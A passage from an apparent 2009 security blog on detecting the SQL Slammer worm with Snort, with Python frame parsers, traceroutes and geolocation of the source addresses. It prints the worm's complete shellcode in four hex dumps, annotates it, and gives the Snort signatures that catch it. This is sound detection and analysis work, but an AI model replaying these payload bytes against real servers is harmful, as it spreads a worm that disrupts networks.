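            # DgmLen covers IP header + TCP header + data, so this is the data length
            current["payload"] = current["dgmlen"] - current["iplen"] - current["tcplen"]
    return packets


def ports_by_source(packets):
    """Destination ports each source touched (the per-SIP lists above)."""
    out = defaultdict(set)
    for p in packets:
        out[p["src"]].add(p["dport"])
    return {src: sorted(ports) for src, ports in out.items()}


def syn_fingerprint(packets, dport):
    """Values shared by every bare SYN to dport (None where they differ).
    Real stacks vary the IP ID and source port and send options (TcpLen > 20);
    one fixed tuple across unrelated sources is the mark of a crafted scanner."""
    syns = [p for p in packets if p["dport"] == dport and p.get("flags") == "******S*"]

    def shared(key):
        vals = {p[key] for p in syns}
        return vals.pop() if len(vals) == 1 else None

    return {
        "sources": len({p["src"] for p in syns}),
        "sport": shared("sport"), "ip_id": shared("id"), "tos": shared("tos"),
        "win": shared("win"), "tcplen": shared("tcplen"), "payload": shared("payload"),
        "seq_low16_zero": all(p["seq"] & 0xFFFF == 0 for p in syns),
    }


if __name__ == "__main__":
    pk = parse_packets(SAMPLE)
    print(ports_by_source(pk))
    print(syn_fingerprint(pk, 2967))
```

Feed it the real output with parse_packets(subprocess.check_output(["snort", "-qdevX", "-r", capture]).decode()); a fingerprint whose sport, win and tcplen are all non-None across many sources says "one tool", and payload == 0 says the packets carried nothing that could be an exploit.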

Tuesday, May 12, 2009

A Brief Anatomy of Malware detection and some notes on using traceroute and determining 'intent'

From the posts below we can begin to understand why signature identification is so important. We are looking for malware in the packet data itself, since any port can be used to send malware and any IP can be spoofed or unwittingly part of a botnet or worm. The packets below are the "Win32:SQLSlammer" worm, which has been around since January 2003. It exploits the SQL Server 2000 Resolution Service stack overflow (CVE-2002-0649, referenced in the rules) with a single 376-byte UDP payload to port 1434 (a 404-byte IP datagram), and propagates by sending copies of itself to randomly generated IP addresses. Notice that the first SIP (Source IP) address is either spoofed or "router leakage": it comes from the RFC 1918 private (non-Internet) range 10.0.0.0/8. Remember that any of these addresses can be (a) spoofed, (b) botnet victims or (c) unpatched SQL servers, so their ultimate location does not necessarily tell us anything about 'intent' or 'bad actors'. Note the common signature in these 376-byte packets. Win32:SQLSlammer wreaked an extraordinary amount of havoc upon the Internet with a very small amount of assembly code. The current Snort rules for this worm look like this (each content: option is a byte pattern that must appear in the UDP payload; depth:1 pins the leading 0x04 to the first payload byte):

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"SQL Worm propagation attempt"; flow:to_server; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1 01|"; content:"sock"; content:"send"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2003; rev:12;)


alert udp $HOME_NET any -> $EXTERNAL_NET 1434 (msg:"SQL Worm propagation attempt OUTBOUND"; flow:to_server; content:"|04|"; depth:1; content:"|81 F1 03 01 04 9B 81 F1|"; content:"sock"; content:"send"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,5310; reference:bugtraq,5311; reference:cve,2002-0649; reference:nessus,11214; reference:url,vil.nai.com/vil/content/v_99992.htm; classtype:misc-attack; sid:2004; rev:11;)


The packets I captured are below. Note the common ASCII signature: the long run of 0x01 filler, the little-endian return address DC C9 B0 42 (0x42B0C9DC, a jmp esp inside sqlsort.dll, which is why the attack only works against an unpatched SQL Server 2000), and the strings the shellcode pushes four bytes at a time, readable in reverse order in the ASCII column as "Qh.dllhel32hkern" (kernel32.dll), "ount...ickC...GetT" (GetTickCount), "32.d...ws2_" plus "ll" (ws2_32.dll), "sock" plus "et" (socket) and "send" plus "to" (sendto). The rule's "sock" and "send" contents are those push immediates, and |81 F1 03 01 04 9B 81 F1 01| is the start of the pair of xor ecx instructions at offset 0x138 that assemble the port-1434 socket address the worm sends itself to.

05/11-14:33:07.744419 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
10.13.3.61:1092 -> 192.168.0.12:1434 UDP TTL:113 TOS:0x20 ID:61068 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 
0x0010: 01 94 EE 8C 00 00 71 11 8B AE 0A 0D 03 3D C0 A8  ......q......=..
0x0020: 00 0C 04 44 05 9A 01 80 63 09 04 01 01 01 01 01  ...D....c.......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........<a...E..
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

05/11-14:53:48.630387 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
202.99.11.99:1231 -> 192.168.0.12:1434 UDP TTL:110 TOS:0x80 ID:26925 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 80  .`.0k...[.....E.
0x0010: 01 94 69 2D 00 00 6E 11 4B 31 CA 63 0B 63 C0 A8  ..i-..n.K1.c.c..
0x0020: 00 0C 04 CF 05 9A 01 80 9A 01 04 01 01 01 01 01  ................
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........<a...E..
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA  

05/11-19:12:48.180440 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
58.20.222.30:1297 -> 192.168.0.12:1434 UDP TTL:114 TOS:0x20 ID:9759 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 
0x0010: 01 94 26 1F 00 00 72 11 48 33 3A 14 DE 1E C0 A8  ..&...r.H3:.....
0x0020: 00 0C 05 11 05 9A 01 80 57 53 04 01 01 01 01 01  ........WS......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........<a...E..
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..

05/11-20:06:49.515800 0:9:5B:0:F3:DA -> 0:60:97:30:6B:C4 type:0x800 len:0x1A2
69.13.200.210:1269 -> 192.168.0.12:1434 UDP TTL:115 TOS:0x20 ID:42723 IpLen:20 DgmLen:404
Len: 376
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20  .`.0k...[.....E 
0x0010: 01 94 A6 E3 00 00 73 11 D0 C1 45 0D C8 D2 C0 A8  ......s...E.....
0x0020: 00 0C 04 F5 05 9A 01 80 61 C2 04 01 01 01 01 01  ........a.......
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB  ..............B.
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90  ........p.B.p.B.
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01  .......h...B....
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5  .1...P..5....P..
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E  Qh.dllhel32hkern
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66  f.llQh32.dhws2_f
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73  .etQhsockf.toQhs
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D  end....B.E.P..P.
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B  E.P.E.P..P....B.
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF  ...=U..Qt.....B.
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1  ...1.QQP........
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A  ....Q.E.P.E.P..j
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50  .j.j...P.E.P.E.P
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D  ........<a...E..
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D  .@...........)..
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51  .....E.j..E.P1.Q
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6  f..x.Q.E.P.E.P..
0x01A0: EB CA                                            ..
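The rule and the hex dumps above are two views of the same bytes. As an added example, not the post's or Snort's code, this Python rebuilds the raw frame from a Snort -X dump, walks the Ethernet, IP and UDP headers to the payload, verifies the IP header checksum, and applies the SID 2003 content checks to the payload exactly as the rule states them. The embedded dump is packet 1 from the capture above with its ASCII column dropped; the parser slices by column, so a dump that keeps the ASCII column parses identically.

```python
"""Rebuild the frame behind a Snort -X hex dump and apply the SID 2003
content checks to the UDP payload. Added example; not the post's or
Snort's code."""
import ipaddress
import struct

# Packet 1 from the capture above (10.13.3.61 -> 192.168.0.12:1434) with the
# ASCII column dropped; the hex block always occupies columns 8..55.
SLAMMER_DUMP = """\
0x0000: 00 60 97 30 6B C4 00 09 5B 00 F3 DA 08 00 45 20
0x0010: 01 94 EE 8C 00 00 71 11 8B AE 0A 0D 03 3D C0 A8
0x0020: 00 0C 04 44 05 9A 01 80 63 09 04 01 01 01 01 01
0x0030: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
0x0040: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
0x0050: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
0x0060: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
0x0070: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
0x0080: 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0 42 EB
0x0090: 0E 01 01 01 01 01 01 01 70 AE 42 01 70 AE 42 90
0x00A0: 90 90 90 90 90 90 90 68 DC C9 B0 42 B8 01 01 01
0x00B0: 01 31 C9 B1 18 50 E2 FD 35 01 01 01 05 50 89 E5
0x00C0: 51 68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E
0x00D0: 51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54
0x00E0: 66 B9 6C 6C 51 68 33 32 2E 64 68 77 73 32 5F 66
0x00F0: B9 65 74 51 68 73 6F 63 6B 66 B9 74 6F 51 68 73
0x0100: 65 6E 64 BE 18 10 AE 42 8D 45 D4 50 FF 16 50 8D
0x0110: 45 E0 50 8D 45 F0 50 FF 16 50 BE 10 10 AE 42 8B
0x0120: 1E 8B 03 3D 55 8B EC 51 74 05 BE 1C 10 AE 42 FF
0x0130: 16 FF D0 31 C9 51 51 50 81 F1 03 01 04 9B 81 F1
0x0140: 01 01 01 01 51 8D 45 CC 50 8B 45 C0 50 FF 16 6A
0x0150: 11 6A 02 6A 02 FF D0 50 8D 45 C4 50 8B 45 C0 50
0x0160: FF 16 89 C6 09 DB 81 F3 3C 61 D9 FF 8B 45 B4 8D
0x0170: 0C 40 8D 14 88 C1 E2 04 01 C2 C1 E2 08 29 C2 8D
0x0180: 04 90 01 D8 89 45 B4 6A 10 8D 45 B0 50 31 C9 51
0x0190: 66 81 F1 78 01 51 8D 45 03 50 8B 45 AC 50 FF D6
0x01A0: EB CA
"""

# content: patterns from the SID 2003 rule above; the leading 0x04 carries
# depth:1 so it must be the first payload byte, the others may appear anywhere.
SID2003_CONTENT = (b"\x81\xf1\x03\x01\x04\x9b\x81\xf1\x01", b"sock", b"send")


def parse_snort_hexdump(text):
    """Snort -X lines are 'OFFSET: ' + 16 'XX ' columns + ASCII. Slicing the
    fixed hex columns avoids mistaking ASCII-column text for bytes."""
    out = bytearray()
    for line in text.splitlines():
        if line.startswith("0x"):
            out += bytes.fromhex(line[8:56])
    return bytes(out)


def ip_checksum(header):
    """RFC 1071 one's-complement sum over the IP header; 0 means valid."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_udp(frame):
    """Ethernet II + IPv4 + UDP; returns header fields and the payload bytes."""
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len, ident = struct.unpack("!HH", ip[2:6])
    if ip[9] != 17:
        raise ValueError("not UDP")
    sport, dport, ulen = struct.unpack("!HHH", ip[ihl:ihl + 6])
    return {
        "src": str(ipaddress.ip_address(ip[12:16])),
        "dst": str(ipaddress.ip_address(ip[16:20])),
        "ttl": ip[8], "id": ident, "total_len": total_len,
        "ip_checksum_ok": ip_checksum(ip[:ihl]) == 0,
        "sport": sport, "dport": dport, "udp_len": ulen,
        "payload": ip[ihl + 8:total_len],
    }


def matches_sid2003(pkt):
    """The rule's test: UDP to 1434, first byte 0x04, then every content:
    string somewhere in the payload."""
    p = pkt["payload"]
    return (pkt["dport"] == 1434 and p[:1] == b"\x04"
            and all(c in p for c in SID2003_CONTENT))


def source_is_private(pkt):
    """RFC 1918 / loopback / link-local source: spoofed or leaked, so not traceable."""
    return ipaddress.ip_address(pkt["src"]).is_private


if __name__ == "__main__":
    pkt = decode_udp(parse_snort_hexdump(SLAMMER_DUMP))
    print(pkt["src"], "->", pkt["dst"], "udp", pkt["sport"], "->", pkt["dport"],
          len(pkt["payload"]), "bytes; SID 2003:", matches_sid2003(pkt),
          "; private source:", source_is_private(pkt))
```

Because the header lengths are read from the bytes rather than assumed, the same decoder copes with a dump whose IP header carries options; the checksum check is a cheap guard against a mis-transcribed or truncated dump before any signature logic runs.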


Notice that with -X Snort gives us the full packet, headers included, in hex and ASCII. This verbosity is what makes robust signature creation and detection possible. (More on that later.) Since the Win32:SQLSlammer worm propagates by generating random IP addresses, the traceroutes below may simply lead back to more victims who have unpatched machines or who are botnet victims. Interestingly, several routers respond to a traceroute toward the private address (the run below was made against 10.13.8.61 rather than the captured 10.13.3.61; the outcome is the same). That is not a sign the address is reachable: the home router and the ISP's routers forward any destination along their default route, and the probes die once they reach a router with no route for 10.0.0.0/8. Tracing an RFC 1918 source tells us nothing about who actually sent the packet:
# traceroute 10.13.8.61
traceroute to 10.13.8.61 (10.13.8.61), 64 hops max, 40 byte packets
 1  192.168.0.1 (192.168.0.1)  0.405 ms  0.334 ms  0.286 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  11.558 ms  11.113 ms  12.196 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  10.639 ms  10.806 ms  15.992 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  13.841 ms  15.408 ms  15.311 ms
 6  * * *
 7  * * *
 8  * * *
 9  * * *
10  * * *

# traceroute 202.99.11.99
traceroute to 202.99.11.99 (202.99.11.99), 64 hops max, 40 byte packets
 1  192.168.0.1 (192.168.0.1)  0.496 ms  0.344 ms  0.376 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  11.941 ms  11.272 ms  15.845 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  24.681 ms  10.952 ms  11.595 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  14.363 ms  19.869 ms  14.247 ms
 6  pos-0-3-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.209)  13.914 ms  14.518 ms  14.792 ms
 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  19.672 ms  18.450 ms  19.496 ms
 8  pos-1-14-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.201)  32.156 ms  35.483 ms  31.574 ms
 9  pos-0-8-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.78)  33.493 ms  33.305 ms  34.754 ms
10  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.50)  37.252 ms  37.343 ms  37.79 ms
11  75.149.229.42 (75.149.229.42)  36.697 ms  40.34 ms  36.615 ms
12  219.158.29.221 (219.158.29.221)  241.962 ms  242.456 ms  242.522 ms
13  219.158.5.133 (219.158.5.133)  242.769 ms  243.188 ms  242.885 ms
14  219.158.4.57 (219.158.4.57)  249.602 ms  249.813 ms  249.892 ms
15  202.96.12.30 (202.96.12.30)  261.865 ms  261.656 ms  261.901 ms
16  61.148.156.9 (61.148.156.9)  267.504 ms  266.695 ms  266.543 ms
17  61.148.156.166 (61.148.156.166)  267.896 ms  267.840 ms  272.820 ms
18  202.96.13.138 (202.96.13.138)  273.190 ms  272.447 ms  272.802 ms
19  211.154.209.162 (211.154.209.162)  234.590 ms  239.304 ms  234.552 ms
20  202.96.6.74 (202.96.6.74)  263.857 ms  265.102 ms  263.489 ms
21  Sh-Rtr-2-S3/0.sta.net.cn (202.96.6.130)  246.632 ms  255.336 ms  245.572 ms
22  * * *

traceroute to 58.20.222.30 (58.20.222.30), 64 hops max, 60 byte packets
 1  192.168.0.1 (192.168.0.1)  0.352 ms  0.337 ms  0.288 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  8.935 ms  9.63 ms  9.107 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.516 ms  9.785 ms  9.715 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.484 ms  12.145 ms  11.947 ms
 6  pos-0-5-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.213)  14.90 ms  14.66 ms  12.611 ms
 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  17.41 ms  16.51 ms  18.15 ms
 8  pos-1-15-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.197)  29.443 ms  30.459 ms  29.458 ms
 9  pos-0-8-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.78)  31.863 ms  31.426 ms  31.794 ms
10  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.54)  35.808 ms  34.497 ms  35.363 ms
11  75.149.229.42 (75.149.229.42)  34.716 ms  64.27 ms  35.371 ms
12  219.158.29.213 (219.158.29.213)  247.202 ms  245.893 ms  247.260 ms
13  219.158.5.109 (219.158.5.109)  234.699 ms  234.229 ms  233.225 ms
14  219.158.9.102 (219.158.9.102)  239.58 ms  240.322 ms  240.992 ms
15  220.248.160.166 (220.248.160.166)  277.291 ms  275.978 ms  274.375 ms
16  58.20.222.30 (58.20.222.30)  245.299 ms  246.499 ms  245.847 ms

# traceroute -P ICMP 69.13.200.210                                     
traceroute to 69.13.200.210 (69.13.200.210), 64 hops max, 60 byte packets
 1  192.168.0.1 (192.168.0.1)  1.198 ms  1.158 ms  1.135 ms
 2  * * *
 3  68.87.207.113 (68.87.207.113)  8.636 ms  11.743 ms  8.967 ms
 4  te-5-3-ur02.ferndale.wa.seattle.comcast.net (68.86.96.110)  9.764 ms  8.822 ms  9.405 ms
 5  te-0-9-0-7-ar01.seattle.wa.seattle.comcast.net (68.86.96.105)  12.576 ms  12.828 ms  11.758 ms
 6  pos-0-5-0-0-cr01.seattle.wa.ibone.comcast.net (68.86.90.213)  13.794 ms  12.422 ms  13.459 ms
 7  pos-0-8-0-0-cr01.portland.or.ibone.comcast.net (68.86.85.206)  17.811 ms  16.782 ms  16.575 ms
 8  pos-1-14-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.85.201)  33.718 ms  28.898 ms  30.359 ms
 9  pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.181)  32.74 ms  32.334 ms  33.448 ms
10  er1-tengig3-4.sanjoseequinix.savvis.net (208.173.53.137)  35.790 ms  33.16 ms  32.538 ms
11  * cr1-tenge-0-3-5-0.sanfrancisco.savvis.net (204.70.200.198)  35.756 ms *
12  * * *
13  msr1-tengig0-0-0-0.dallas.savvis.net (204.70.196.202)  80.164 ms  81.798 ms  80.857 ms
14  er1-ge-3-0-6.dallas.savvis.net (204.70.202.61)  78.275 ms  75.309 ms  75.975 ms
15  federal-home-loan.Dallas.savvis.net (208.172.135.2)  76.970 ms  77.282 ms  77.882 ms
16  64.182.192.41 (64.182.192.41)  79.384 ms  79.456 ms  79.130 ms
17  210-200-13-69.cust.propagation.net (69.13.200.210)  76.181 ms  78.84 ms  77.538 ms

# geoiplookup 202.99.11.99 -f /usr/local/share/GeoIP/GeoLiteCity.dat
GeoIP City Edition, Rev 1: CN, 22, Beijing, (null), 39.928902, 116.388298, 0, 0
# geoiplookup 58.20.222.30 -f /usr/local/share/GeoIP/GeoLiteCity.dat 
GeoIP City Edition, Rev 1: CN, 11, Changsha, (null), 28.179199, 113.113602, 0, 0
# geoiplookup 69.13.200.210  -f /usr/local/share/GeoIP/GeoLiteCity.dat
GeoIP City Edition, Rev 1: US, TX, Fort Worth, 76112, 32.749199, -97.220497, 623, 817

Monday, May 11, 2009

Where are the SIPs from? Part II

The following sequence of commands and output gives some idea of what a network security analyst's life was like before the development of Intrusion Prevention Systems. After a laboriously constructed tcpdump filter, we run this for 36 hours on our dummy/honeypot host. We then have a collection of SIPs sending packets to various ports. Some of these are easily identifiable well-known attack ports (ms-sql, telnet, ssh, etc.).

/usr/local/sbin/tcpdump -s 0 -i xl0 -ttt -w out.txt  'port not(domain or whois or http or https or syslog or ntp or smtp or 137 or 139)' and 'not(broadcast or icmp or igmp or arp)' 

  
# tcpdump -r out.txt
tcpdump: WARNING: snaplen raised from 96 to 65535
21:07:30.303358 218.7.164.30.6000 > 192.168.0.12.ms-sql-s: S 69599232:69599232(0) win 16384 [tos 0x20]
21:30:08.976883 202.99.11.99.1231 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
22:20:11.329910 catv-86-101-50-119.catv.broadband.hu.1077 > 192.168.0.12.38507: udp 28 [tos 0x20]
23:01:48.360917 10.13.3.61.1092 > 192.168.0.12.ms-sql-m: udp 376 [tos 0x20]
23:40:09.452031 117.0.33.129.3285 > 192.168.0.12.telnet: S 543288824:543288824(0) win 5808 (DF) [tos 0x20]
00:36:06.236501 dynamic.91.192.169.55.vpcit.ru.1076 > 192.168.0.12.38507: udp 30 [tos 0x20]
